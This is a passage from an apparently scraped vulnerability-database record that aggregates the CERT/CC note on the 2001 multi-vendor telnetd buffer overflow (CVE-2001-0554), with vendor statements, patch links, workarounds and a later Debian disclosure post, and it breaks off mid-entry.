\n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-server-0.17-2U60_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-0.17-2U60_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/telnet-0.17-2U70_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-0.17-2U70_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-server-0.17-2U70_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n` \n \n`ADDITIONAL INSTRUCTIONS \nUsers of Conectiva Linux version 6.0 or higher may use apt to perform \nupgrades of RPM packages: \n- add the following line to /etc/apt/sources.list if it is not there yet \n(you may also use linuxconf to do this): \n` \n` rpm [cncbr] ``<ftp://atualizacoes.conectiva.com.br>`` 6.0/conectiva updates \n` \n`(replace 6.0 with the correct version number if you are not running CL6.0) \n` \n` - run: apt-get update \n- after that, execute: apt-get upgrade \n` \n` Detailed instructions reagarding the use of apt and upgrade examples \ncan be found at ``<http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en>`` \n` \n \n`- ------------------------------------------------------------------------- \nAll packages are signed with Conectiva's GPG key. 
The key and instructions \non how to import it can be found at \n``<http://distro.conectiva.com.br/seguranca/chave/?idioma=en>`` \nInstructions on how to check the signatures of the RPM packages can be \nfound at ``<http://distro.conectiva.com.br/seguranca/politica/?idioma=en>`` \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n``<http://distro.conectiva.com.br/atualizacoes/?idioma=en>`` \n` \n`- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.4 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE7hqHX42jd0JmAcZARAq2tAKDTiE4tzCaFXf8ZCGMLNCE1m+PUfwCg2hpZ \nvPyXIWcdPbi77u2qfgBpUDc= \n=DWFX \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Cray __ Affected\n\nUpdated: September 07, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCray, Inc. has found UNICOS and UNICOS/mk to be vulnerable. Please see Field Notice 5062 and spr 720789 for fix information. 
We are currently investigating the MTA for vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Debian Affected\n\nNotified: July 24, 2001 Updated: August 20, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### FreeBSD __ Affected\n\nNotified: July 24, 2001 Updated: August 21, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll released versions of FreeBSD are vulnerable to this problem, which was fixed in FreeBSD 4.3-STABLE and FreeBSD 3.5.1-STABLE on July 23, 2001. An advisory has been released, along with a patch to correct the vulnerability and a binary upgrade package suitable for use on FreeBSD 4.3-RELEASE systems. 
For more information, see the advisory at the following location:\n\n<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc> \n \nor use an FTP mirror site from the following URL: \n \n<http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFreeBSD has also released <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01%3A54.ports-telnetd.asc>, a follow up advisory releated to third party implementations found in FreeBSD ports collection.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Hewlett Packard __ Affected\n\nNotified: July 24, 2001 Updated: October 19, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\\----------------------------------------------------------------\n\nHEWLETT-PACKARD COMPANY SECURITY BULLETIN: #0172 \nOriginally issued: 16 October 2001 \n\\----------------------------------------------------------------- \n \nThe information in the following Security Bulletin should be acted \nupon as soon as possible. Hewlett-Packard Company will not be \nliable for any consequences to any customer resulting from customer's \nfailure to fully implement instructions in this Security Bulletin as \nsoon as possible. \n \n\\------------------------------------------------------------------ \nPROBLEM: Systems running telnetd may permit unauthorized remote \naccess. \nSee: <http://www.cert.org/advisories/CA-2001-21.html> \n \nThis vulnerability has been assigned the identifier \nCAN-2001-0554 by the Common Vulnerabilities and Exposures \n(CVE) group: \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0554> \n \n \nPLATFORM: HP9000 Servers running HP-UX releases 10.X only. 
\n \nDAMAGE: An intruder can potentially execute arbitrary code \nwith the privileges of the telnetd process. \n \nSOLUTION: Apply the following patches to the release specified. \n \n10.01 PHNE_24820, \n10.10 PHNE_24820, \n10.20 PHNE_24821, \nSIS 10.20 PHNE_24822 (Telnet kerberos Patch), \n10.24 PHNE_25217. \n \nMANUAL ACTIONS: The Secure Internet Services (SIS) product, if \nenabled, has to be disabled before the installation \nor removal of PHNE_24822 (Telnet kerberos Patch). \n \nAVAILABILITY: The patches are available now from <http://itrc.hp.com>. \n \n\\------------------------------------------------------------------ \nA. Background \nA potential remotely exploitable buffer overflow in telnetd has \nbeen reported to Hewlett-Packard Company. It is unique to HP-UX \nreleases 10.X only. \n \nB. Fixing the problem \nDisable telnetd (by commenting out the /etc/inetd.conf entry for \ntelnetd and running '/usr/sbin/inetd -c') if telentd is not needed \non your system. \n \nInstall the appropriate patch from the list below. \n \nC. Recommended solution \n \nApply the following patches to the release specified. \n \n10.01 PHNE_24820, \n10.10 PHNE_24820, \n10.20 PHNE_24821, \nSIS 10.20 PHNE_24822, \n10.24 PHNE_25217. \n \nAll patches are available now from <http://itrc.hp.com>. \n \nD. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n \nUse your browser to get to the HP IT Resource Center page \nat: \n \n<http://itrc.hp.com> \n \nUse the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n \nIn the left most frame select \"Maintenance and Support\". 
\n \nUnder the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n \nTo -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n \nor \n \nTo -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n \nTo -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n \nFor information on the Security Patch Check tool, see: \n<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/> \ndisplayProductInfo.pl?productNumber=B6834AA\" \n \nThe security patch matrix is also available via anonymous \nftp: \n \nftp.itrc.hp.com:~ftp/export/patches/hp-ux_patch_matrix \n \nOn the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n \n \nE. To report new security vulnerabilities, send email to \n \nsecurity-alert@hp.com \n \nPlease encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com. \n \nPermission is granted for copying and circulating this \nBulletin to Hewlett-Packard (HP) customers (or the Internet \ncommunity) for the purpose of alerting them to problems, \nif and only if, the Bulletin is not edited or changed in \nany way, is attributed to HP, and provided such reproduction \nand/or distribution is performed for non-commercial purposes. 
\n \nAny other use of this information is prohibited. HP is not \nliable for any misuse of this information by any third party. \n_____________________________________________________________\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### IBM __ Affected\n\nNotified: July 24, 2001 Updated: August 10, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nIBM's AIX operating system, versions 5.1L and under, is vulnerable to this exploit. \n\n\nAn emergency fix (efix) is now available for downloading from the ftp site <ftp://aix.software.ibm.com/aix/efixes/security>. The efix package name to fix this vulnerability is \"telnetd_efix.tar.Z\". An advisory is included in the tarfile that gives installation instructions for the appropriate patched telnetd binary. Two patches are in the tarfile: one for AIX 4.3.3 (telnetd.433) and for AIX 5.1 (telnetd.510). \n \nIBM has these APAR assignments for this vulnerability: For AIX 4.3.3, the APAR number is IY22029. 
For AIX 5.1, the APAR number is IY22021.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### MiT Kerberos Development Team __ Affected\n\nUpdated: August 09, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <http://web.mit.edu/kerberos/www/advisories/telnetd.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \n\n\nKRB5 TELNETD BUFFER OVERFLOWS \n \n2001-07-31 \n \nSUMMARY: \n \nBuffer overflows exist in the telnet daemon included with MIT krb5. \nExploits are believed to exist for various operating systems on at \nleast the i386 architecture. \n \nIMPACT: \n \nIf telnetd is running, a remote user may gain unauthorized root \naccess. \n \nVULNERABLE DISTRIBUTIONS: \n \n* MIT Kerberos 5, all releases to date. \n \nFIXES: \n \nThe recommended approach is to apply the appropriate patches and to \nrebuild your telnetd. Patches for the krb5-1.2.2 release may be found \nat: \n \n<http://web.mit.edu/kerberos/www/advisories/telnetd_122_patch.txt> \n \nThe associated detached PGP signature is at: \n \n<http://web.mit.edu/kerberos/www/advisories/telnetd_122_patch.txt.asc> \n \nThese patches might apply successfully to older releases with some \namount of fuzz. \n \nPlease note that if you are using GNU make to build your krb5 sources, \nthe build system may attempt to rebuild the configure script from the \nchanged configure.in. This may cause trouble if you don't have \nautoconf installed properly. 
To prevent this, you should use the \ntouch command or some similar means to ensure that the file \nmodification time on the configure script is newer than that of the \nconfigure.in file. \n \nIf you are unable to patch your telnetd, you may should disable the \ntelnet service altogether. \n \nThis announcement and code patches related to it may be found on the \nMIT Kerberos security advisory page at: \n \n<http://web.mit.edu/kerberos/www/advisories/index.html> \n \nThe main MIT Kerberos web page is at: \n \n<http://web.mit.edu/kerberos/www/index.html> \n \nACKNOWLEDGMENTS: \n \nThanks to TESO for the original alert / Bugtraq posting. \n \nThanks to Jeffrey Altman for assistance in developing these patches. \n \nDETAILS: \n \nA buffer overflow bug was discovered in telnet daemons derived from \nBSD source code. Since the telnet daemon in MIT krb5 uses code \nlargely derived originally from BSD sources, it too is vulnerable. \n \nBy carefully constructing a series of telnet options to send to a \ntelnet server, a remote attacker may exercise a bug relating to lack \nof bounds-checking, causing an overflow of a fixed-size buffer. This \noverflow may possibly force the execution of malicious code. \n \nIt is not known how difficult this vulnerability is to exploit, since \nthe buffer is not on the stack. Some discussion seems to indicate \nthat exploits exist for this vulnerability that are believed to work \nagainst various operating systems for i386-based machines. It is not \nknown whether these existing exploits have been successfully ported to \nother processors. 
\n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 6.5.8 \n \niQCVAwUBO2cP4qbDgE/zdoE9AQEdhQQAsAxuzVwWu7pbtZ8ouNK7VAFrODGBHJ6R \nAxizbvpPMEUAPmHtNqyC+J7hmdcumAxm4ro1dQ6qqZrpV8e8X+MykNoOkt7jbzqz \nQ3KgfV8DkEthtoZ7M6asMrNScE6tBU6hfBAk33RU25vHMM42PRdRjliIDCCJl3pu \n/slqReyHFTg= \n=i6/X \n\\-----END PGP SIGNATURE-----\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll releases of NetBSD are affected. The issue was patched in NetBSD-current on July 19th. A Security Advisory including patches will be available shortly, at:\n\n<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc> \n \nNetBSD releases since July 2000 have shipped with telnetd disabled by default. If it has been re-enabled on a system, it is highly recommended to disable it at least until patches are installed. 
Furthermore, NetBSD recommends the use of a Secure Shell instead of telnet for most applications.\"\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### OpenBSD Affected\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### RedHat __ Affected\n\nNotified: July 24, 2001 Updated: August 13, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see <https://www.redhat.com/support/errata/RHSA-2001-100.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SGI __ Affected\n\nNotified: July 24, 2001 Updated: July 26, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSGI acknowledges the telnetd vulnerability reported by CERT and is currently investigating. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. 
\n\n\nAs further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list and \n \n<http://www.sgi.com/support/security/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SuSE __ Affected\n\nUpdated: October 11, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe 7.x distribution update directories contain update packages for the recently discovered in.telnetd security problem (buffer overflow). While we are working for a solution for the 6.x distribution, the available packages are ready for use. It is recommended to apply these updates as soon as possible. The packages for the 7.1 distribution are called nkitserv.rpm, for 7.2 it's called telnet-server.rpm. The packages for the 6.x distributions prove to worksome because of a much older codebase and changed behaviour of parts of the glibc. We hope to be able to provide a suitable solution soon. \nWe recommend to disable the telnet service by commenting it out from the /etc/inetd.conf file (with a following \"killall -HUP inetd\" to make inetd re-read its config file) until an update package for your distribution is available. If you do not need the telnet server service, you should leave the service disabled even if you have applied an update package to your system.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSuSE has released a security announcement related to this vulnerability. 
It is located at <http://www.suse.com/de/support/security/2001_029_nkitb_txt.txt>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sun __ Affected\n\nNotified: July 24, 2001 Updated: April 16, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA buffer overflow has been discovered in in.telnetd which allows a local or a remote attacker to kill the in.telnetd daemon on the affected SunOS system. Sun does not believe that this issue can be exploited on SunOS systems to gain elevated privileges. As there was a buffer overflow, Sun has generated patches for this issue. The patches are described in the following SunAlert:\n\n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F28063> \nand are available from: \n\n\n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Compaq Computer Corporation __ Not Affected\n\nNotified: July 24, 2001 Updated: August 01, 2001 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n\n\n_______________________________________________________________ \nSOURCE: Compaq Computer Corporation \nCompaq Services \nSoftware Security Response Team USA \n \nCompaq case id SSRT0745U \n \nref: potential telnetd option handling vulnerability \n \nx-ref: TESO Security Advisory 06/2001 \nCERT CA2001-21 Advisory 07/2001 \n \n \nCompaq has evaluated this vulnerability to telnetd \ndistributed for Compaq Tru64/UNIX and OpenVMS Operating \nSystems Software and has determined that telnetd is not \nvulnerable to unauthorized 
command execution or \nroot compromise. \n \nCompaq appreciates your cooperation and patience. \nWe regret any inconvenience applying this information \nmay cause. \n \nAs always, Compaq urges you to periodically review your system \nmanagement and security procedures. Compaq will continue to \nreview and enhance the security features of its products and work \nwith customers to maintain and improve the security and integrity \nof their systems. \n \nTo subscribe to automatically receive future NEW Security \nAdvisories from the Compaq's Software Security Response Team \nvia electronic mail, \n \nUse your browser select the URL \n<http://www.support.compaq.com/patches/mailing-list.shtml> \nSelect \"Security and Individual Notices\" for immediate dispatch \nnotifications directly to your mailbox. \n \nTo report new Security Vulnerabilities, send mail to: \nsecurity-ssrt@compaq.com \n \n(c) Copyright 2001 Compaq Computer Corporation. All rights reserved. \n \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.1 \n \niQA/AwUBO2C5JjnTu2ckvbFuEQKmqwCg/m87d9k22+qV5GY2vJAR409KFD4AoIbR \nvsQaZ9DOI4D4sj5Feg4bRZmS \n=F5Nq \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Secure Computing Corporation __ Not Affected\n\nUpdated: July 31, 2001 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe telnetd vulnerability referenced is not applicable to Sidewinder as a result of disciplined security software design practices in combination with Secure Computing's patented Type Enforcement(tm) technology. Sidewinder's telnetd services are greatly restricted due to both known and theoretical vulnerabilities. 
This least privilege design renders the attack described in the CERT-2001-21 Advisory useless. In addition, Sidewinder's operating system, SecureOS(tm), built on Secure's Type Enforcement technology, has further defenses against this attack that would trigger multiple security violations. \n\n\nSpecifically, the attack first attempts to start a shell process. Sidewinder's embedded Type Enforcement security rules prevent telnetd from replicating itself and accessing the system shell programs. Even without this embedded, tamper proof rule in place, other Type Enforcement rules also defend against this attack. As an example, the new shell would need administrative privileges and those privileges are not available to the telnetd services.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Data General Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at 
this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Microsoft Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### NEC Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Nokia Unknown\n\nNotified: July 24, 2001 Updated: July 24, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### SCO Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not 
provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sequent Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Sony Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Unisys Unknown\n\nNotified: July 24, 2001 Updated: August 15, 2001 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\nView all 28 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | 
Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.securityfocus.com/bid/3064>\n * <http://www.team-teso.net/advisories/teso-advisory-011.tar.gz>\n * <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc>\n\n### Acknowledgements\n\nThe CERT Coordination Center thanks TESO, who published an advisory on this issue. We would also like to thank Jeff Polk for technical assistance.\n\nThis document was written by Ian A. Finlay & Jason Rafail.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0554](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0554>) \n---|--- \n**CERT Advisory:** | [CA-2001-21 ](<http://www.cert.org/advisories/CA-2001-21.html>) \n**Severity Metric:** | 74.81 \n**Date Public:** | 2001-07-18 \n**Date First Published:** | 2001-07-24 \n**Date Last Updated: ** | 2002-04-16 19:36 UTC \n**Document Revision: ** | 42 \n", "modified": "2002-04-16T19:36:00", "published": "2001-07-24T00:00:00", "id": "VU:745371", "href": "https://www.kb.cert.org/vuls/id/745371", "type": "cert", "title": "Multiple vendor telnet daemons vulnerable to buffer overflow via crafted protocol options", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "\r\nExposure:\r\n\r\n Remote root compromise through buffer handling flaws\r\n\r\nConfirmed vulnerable:\r\n\r\n Up-to-date Debian 3.0 woody (issue is Debian-specific)\r\n Debian netkit-telnet-ssl-0.17.24+0.1 package\r\n Debian netkit-telnet-ssl-0.17.17+0.1 package\r\n\r\nMitigating factors:\r\n\r\n Telnet service must be running and accessible to the attacker.\r\n Nowadays, telnet service presence on newly deployed Linux hosts is\r\n relatively low. 
The service is still used for LAN access from other unix\r\n platforms, and to host various non-shell services (such as MUDs).\r\n\r\nProblem description:\r\n\r\n Netkit telnetd implementation shipped with Debian Linux appears to be\r\n lacking the AYT vulnerability patch. This patch was devised by Red Hat\r\n (?) and incorporated into Debian packages, but later dropped.\r\n\r\n This exposes the platform to a remote root problem discovered by scut of\r\n TESO back in 2001 (CVE-2001-0554), as well as to other currently\r\n unpublished flaws associated with the old buffer handling code, and\r\n elliminated by the Red Hat's overhaul of buffer handling routines.\r\n\r\n Based on a review of package changelogs, my best guess is that the patch\r\n was accidentally dropped by Christoph Martin in December 2001, but I\r\n have not researched the matter any further.\r\n\r\nVendor response:\r\n\r\n I have contacted Debian security staff on August 29, and received a\r\n confirmation of the problem from Matt Zimmerman shortly thereafter.\r\n\r\n Since this is not a new flaw, I did not plan to release my own advisory,\r\n hoping they will release a DSA bulletin and fix the problem. Three weeks\r\n have passed, however, and Debian did not indicate any clear intent to\r\n release the information any time soon. They did release nine other\r\n advisories in the meantime, some of which were of lesser importance.\r\n\r\n As such, I believe it is a good idea to bring the problem to public\r\n attention, particularly since those running telnetd were and are,\r\n unbeknownst to them, vulnerable to existing exploits.\r\n\r\nWorkaround:\r\n\r\n Disable telnet service if not needed; manually apply Red Hat\r\n netkit patches, or compile the daemon from Red Hat sources.\r\n\r\n Note that netkit as such is no longer maintained by the author, and\r\n hence obtaining the most recent source tarball (0.17) is NOT\r\n sufficient. 
You may also examine other less popular telnetd\r\n implementations, but be advised that almost all are heavily based on the\r\n original code, and not always up-to-date with security fixes for that\r\n codebase.\r\n\r\n\r\nPS. Express your outrage: http://eprovisia.coredump.cx.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-09-19T00:00:00", "published": "2004-09-19T00:00:00", "id": "SECURITYVULNS:DOC:6843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6843", "title": "[Full-Disclosure] Debian netkit telnetd vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2001-0554"], "edition": 1, "description": "### Background\n\nNetKit-telnetd is a standard Linux telnet client and server from the NetKit utilities. \n\n### Description\n\nA possible buffer overflow exists in the parsing of option strings by the telnet daemon, where proper bounds checking is not applied when writing to a buffer. Additionaly, another possible buffer overflow has been found by Josh Martin in the handling of the environment variable HOME. \n\n### Impact\n\nA remote attacker sending a specially-crafted options string to the telnet daemon could be 